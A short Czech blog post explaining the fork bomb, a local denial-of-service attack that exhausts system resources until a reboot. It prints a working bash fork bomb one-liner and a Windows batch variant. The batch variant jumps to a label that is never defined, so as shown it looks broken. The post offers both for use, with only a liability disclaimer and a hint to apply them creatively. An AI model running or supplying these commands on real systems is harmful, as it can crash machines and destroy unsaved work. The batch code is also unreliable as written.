Forkbomb

12. 05. 2014 | Jakub Kadlčík | CZ

Forkbomb je lokální DoS útok proti operačnímu systému. Je založený na nekonečné rekurzi forkovací funkce, která má za následek požírání systémových zdrojů, které lze vyřešit až následným rebootem systému.

Upozornění: Autor tohoto zápisku není zodpovedný za škody vzniklé spouštěním následujících skriptů.

##Implementace

###Windows

start
%0
goto :s

###GNU/Linux

:(){ :|:& };:

Použití

Ve windows vytvoříme bat soubor, v linuxu lze spustit příkaz přímo z konzole, nebo vytvořit spustitelný soubor. Zbytek záleží na vaši fantasii.

Odkazy

  1. http://www.cyberciti.biz/faq/understanding-bash-fork-bomb/
  2. http://en.wikipedia.org/wiki/Fork_bomb